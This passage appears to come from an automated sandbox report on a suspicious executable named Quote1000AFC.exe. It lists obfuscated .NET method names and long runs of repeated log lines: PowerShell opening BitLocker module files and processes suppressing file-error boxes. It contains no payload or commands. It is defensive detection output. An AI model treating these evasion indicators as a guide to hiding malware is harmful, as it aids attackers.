                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, qfS61f2Jh1nOFeWKOm.csHigh entropy of concatenated method names: 'rdcYsUXgy8', 'JdcYxAWJKP', 'aRnY7fo7k9', 'BZeY2xYA0c', 'YNvY3931iD', 'EkeYdBqsKa', 'O28YOkWAst', 'mmEYIhWo4w', 'tHwYLSPoTh', 'Y25YBVSJU8'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, UK6cyORUXCtY0X250DV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WmlBnPKNYx', 'UZDB0u6Wig', 'lobBitdpsR', 'IwDBSw5jnk', 'VuOBcvM2UX', 'LdrBa4GxBo', 'joVBEEST7M'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, J06KvwGtSNrAwXD4CM.csHigh entropy of concatenated method names: 'bvSKa4cQk', 'JtEsHyYsU', 'rpVxLtDad', 'dbfknrn4F', 'KLL2O9F9T', 'DBh1oDwsG', 'DlZ4w3EFG2RcuZpClH', 'LvlagTH7lUL2GXODjK', 'Bi8InKvKJ', 'GfPBq1L7p'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, oxj6oHlN6AlTk9qeD0.csHigh entropy of concatenated method names: 'YwQgu3g8mC', 'n4JgYawWXl', 'VM0grfcst5', 'JlOrmUcBwK', 'jIlrz3piaq', 'Xb5gUBlPOS', 'q5QgRZ7rnE', 'rEvgGmx3BT', 'peog9A6oor', 'F80g5UKoiZ'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, JJ6xFf7mKtA4lS5r3v.csHigh entropy of concatenated method names: 'hm3TSVewro', 'xmvTcNqeK0', 'KjiTaZ0noK', 'Or7TEFkaln', 'D3LTbTu4eo', 'pbmTp7PYFp', 'gjKTfSbgE4', 'ktXTyFOheq', 'f1lTv9PCnl', 'L7eTmLu2Wl'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, q77CsIRRdTVjjwaF2Cr.csHigh entropy of concatenated method names: 'WHtBmKEjmb', 'VLiBzv4CZq', 'uPD6UxplS1', 'UYK6R9K8L9', 'GuY6GLiPAC', 'I5S69A9xL3', 'xx565uqpPJ', 'Enb6wF1rMX', 'MEj6ux7Xgq', 'sHf6T43sCw'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, zL608QiLyCdhkGKmRi.csHigh entropy of concatenated method names: 'YbaN7Af6pI', 's8RN2XiNBe', 'YsbN8vgNIg', 'molNqfvtG7', 'VCCNFMkYMQ', 'zwhNMgpsMx', 'H3mNl2u9xj', 'aMoNeer5ao', 'PjRNJde8gR', 'nLKNn3cF4R'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, XRo4ZZmxNR1d1fnSs3.csHigh entropy of concatenated method names: 'z3IBYLBc6y', 'pfmBWkCnLS', 'AoYBrywYKy', 'MmiBgy3fJ8', 'bYVBLDUFXM', 'CtPBQoYfGB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, LEJh5RthuMkl7wRs3c.csHigh entropy of concatenated method names: 'kBOgVD0PXp', 'vK2g4yTPvr', 'Q0BgK24Rlu', 'zKIgsFWwch', 'mJlgZG1QLM', 'jvWgxaDNXs', 'bUngkUcPwJ', 'GLug7gYFOl', 'pj3g2NrWs2', 'gkyg1ZXZeE'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, gZfgQZpFuJo3Jjw3oZ.csHigh entropy of concatenated method names: 'WcLOygeQ0f', 'lVUOmMZZg4', 'VC6IUO1JFr', 'D5cIRghFTC', 'ycSOnL1cuu', 'HCgO0PMQiA', 'Dc8OieMvBU', 'G7wOSFvPs5', 'LRYOcbu84X', 'MUVOaYDhc6'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, IhoExSvOFNGQcGxW3U.csHigh entropy of concatenated method names: 'M5JL8bS1CD', 'eGWLqrfJ6S', 'uxGLHKSgn3', 'P3RLFmBBNU', 'WruLMk956Y', 'NPuLP0FTFl', 'vpoLlj74JK', 'Al3LerurY4', 'haxLtpXoYj', 'NZdLJ3t8wj'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, Br40tUz1Ya1axtMoEu.csHigh entropy of concatenated method names: 'afIBxo1cA6', 'W22B7GiJsw', 'bhdB2QqLrj', 'WFHB8I7ZbC', 'wfWBqKiiOj', 'autBF0YJdZ', 'lvLBMGKE6Z', 'CqpBhGQwqe', 'puWBVkqKSw', 'jJdB4hIhr6'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, WlO1MHfEDhmWAxANRw.csHigh entropy of concatenated method names: 'ab2L3tfKLU', 'XRLLORYUDI', 'B04LL1tkJ3', 'rpRL6Fnk8p', 'h8yLo5iJYL', 'F3aLhVX2pg', 'Dispose', 'qceIuTlv9h', 'XRrIT3oH7I', 'd1BIYP33ak'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, dsR6pf1i3WArO0nCn8.csHigh entropy of concatenated method names: 'RjZWZ3byCi', 'MTVWk4TfOU', 'UueYHOdJpT', 'wt1YFCJYQX', 'VtSYMA6Gl4', 'ySpYPtE5E4', 'qu2YlOhcJs', 'pMtYexhyf3', 'lYuYtMJUJU', 'TgiYJVqKPc'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, f9cb4dR5odlHbfeq908.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Br7jLikRiq', 'KYIjBcjuBB', 'xtGj64X5RQ', 'LNejjDxg2i', 'ul9josABpQ', 'hmVjDaYkK4', 'pTajhwh0bH'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, unRH8MSNVJDPFNHqS1.csHigh entropy of concatenated method names: 'vgv3J4K8en', 'ISl30Ligc6', 'O4v3SunWRB', 'hRB3cVRoRR', 'S8E3qstPQ0', 'M9J3HYgqvf', 'PJb3F4MTCt', 'Fxp3MnG7cK', 'kDW3PNQF4P', 'iGB3lnr9pr'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, WtmYa85GbLK1fNEU0G.csHigh entropy of concatenated method names: 'VrFRgJ6xFf', 'YKtRQA4lS5', 'WJhRC1nOFe', 'iKORXm9sR6', 'PnCR3n89Xq', 'SZ0Rd8BFmZ', 'ReDql8ZNhvJ8dKiStf', 'lpwhh7QmhQ2fLqvNuC', 'kP3RRhkr1Q', 'Qp6R9Yvlyh'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, yAYBZtTXbh57NMlVjU.csHigh entropy of concatenated method names: 'Dispose', 'xmWRvAxANR', 'hEMGqj2tDH', 'qdsqBebVg3', 'ePeRmGTmdr', 'mMERzl5Xga', 'ProcessDialogKey', 'hTFGUhoExS', 'qFNGRGQcGx', 'i3UGGyRo4Z'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, xxv979QMCETu81wijB.csHigh entropy of concatenated method names: 'N2f9wTyagy', 'WAU9ulk810', 'w499TmthmC', 'xRE9YOyHPg', 'GUx9WMX9aP', 'pMj9rAtqy5', 'kJc9g4sJ6i', 'mPc9QAtxvg', 'Jau9A0O7AE', 'kQ89CnK5cD'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, cXqaZ088BFmZTQ9F5Q.csHigh entropy of concatenated method names: 'Xccrw1LQG4', 'b6QrTDWjXC', 'OTorWkObuf', 'vZPrgIA7I3', 'xvbrQtwMJ1', 'zMwWbwhr3g', 'lh6WpwUMPX', 'jqDWfOkMpy', 'B9LWychl8d', 'nbvWvsfcyP'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, qfS61f2Jh1nOFeWKOm.csHigh entropy of concatenated method names: 'rdcYsUXgy8', 'JdcYxAWJKP', 'aRnY7fo7k9', 'BZeY2xYA0c', 'YNvY3931iD', 'EkeYdBqsKa', 'O28YOkWAst', 'mmEYIhWo4w', 'tHwYLSPoTh', 'Y25YBVSJU8'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, UK6cyORUXCtY0X250DV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WmlBnPKNYx', 'UZDB0u6Wig', 'lobBitdpsR', 'IwDBSw5jnk', 'VuOBcvM2UX', 'LdrBa4GxBo', 'joVBEEST7M'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, J06KvwGtSNrAwXD4CM.csHigh entropy of concatenated method names: 'bvSKa4cQk', 'JtEsHyYsU', 'rpVxLtDad', 'dbfknrn4F', 'KLL2O9F9T', 'DBh1oDwsG', 'DlZ4w3EFG2RcuZpClH', 'LvlagTH7lUL2GXODjK', 'Bi8InKvKJ', 'GfPBq1L7p'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, oxj6oHlN6AlTk9qeD0.csHigh entropy of concatenated method names: 'YwQgu3g8mC', 'n4JgYawWXl', 'VM0grfcst5', 'JlOrmUcBwK', 'jIlrz3piaq', 'Xb5gUBlPOS', 'q5QgRZ7rnE', 'rEvgGmx3BT', 'peog9A6oor', 'F80g5UKoiZ'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, JJ6xFf7mKtA4lS5r3v.csHigh entropy of concatenated method names: 'hm3TSVewro', 'xmvTcNqeK0', 'KjiTaZ0noK', 'Or7TEFkaln', 'D3LTbTu4eo', 'pbmTp7PYFp', 'gjKTfSbgE4', 'ktXTyFOheq', 'f1lTv9PCnl', 'L7eTmLu2Wl'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, q77CsIRRdTVjjwaF2Cr.csHigh entropy of concatenated method names: 'WHtBmKEjmb', 'VLiBzv4CZq', 'uPD6UxplS1', 'UYK6R9K8L9', 'GuY6GLiPAC', 'I5S69A9xL3', 'xx565uqpPJ', 'Enb6wF1rMX', 'MEj6ux7Xgq', 'sHf6T43sCw'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, zL608QiLyCdhkGKmRi.csHigh entropy of concatenated method names: 'YbaN7Af6pI', 's8RN2XiNBe', 'YsbN8vgNIg', 'molNqfvtG7', 'VCCNFMkYMQ', 'zwhNMgpsMx', 'H3mNl2u9xj', 'aMoNeer5ao', 'PjRNJde8gR', 'nLKNn3cF4R'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, XRo4ZZmxNR1d1fnSs3.csHigh entropy of concatenated method names: 'z3IBYLBc6y', 'pfmBWkCnLS', 'AoYBrywYKy', 'MmiBgy3fJ8', 'bYVBLDUFXM', 'CtPBQoYfGB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, LEJh5RthuMkl7wRs3c.csHigh entropy of concatenated method names: 'kBOgVD0PXp', 'vK2g4yTPvr', 'Q0BgK24Rlu', 'zKIgsFWwch', 'mJlgZG1QLM', 'jvWgxaDNXs', 'bUngkUcPwJ', 'GLug7gYFOl', 'pj3g2NrWs2', 'gkyg1ZXZeE'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, gZfgQZpFuJo3Jjw3oZ.csHigh entropy of concatenated method names: 'WcLOygeQ0f', 'lVUOmMZZg4', 'VC6IUO1JFr', 'D5cIRghFTC', 'ycSOnL1cuu', 'HCgO0PMQiA', 'Dc8OieMvBU', 'G7wOSFvPs5', 'LRYOcbu84X', 'MUVOaYDhc6'
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, IhoExSvOFNGQcGxW3U.csHigh entropy of concatenated method names: 'M5JL8bS1CD', 'eGWLqrfJ6S', 'uxGLHKSgn3', 'P3RLFmBBNU', 'WruLMk956Y', 'NPuLP0FTFl', 'vpoLlj74JK', 'Al3LerurY4', 'haxLtpXoYj', 'NZdLJ3t8wj'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
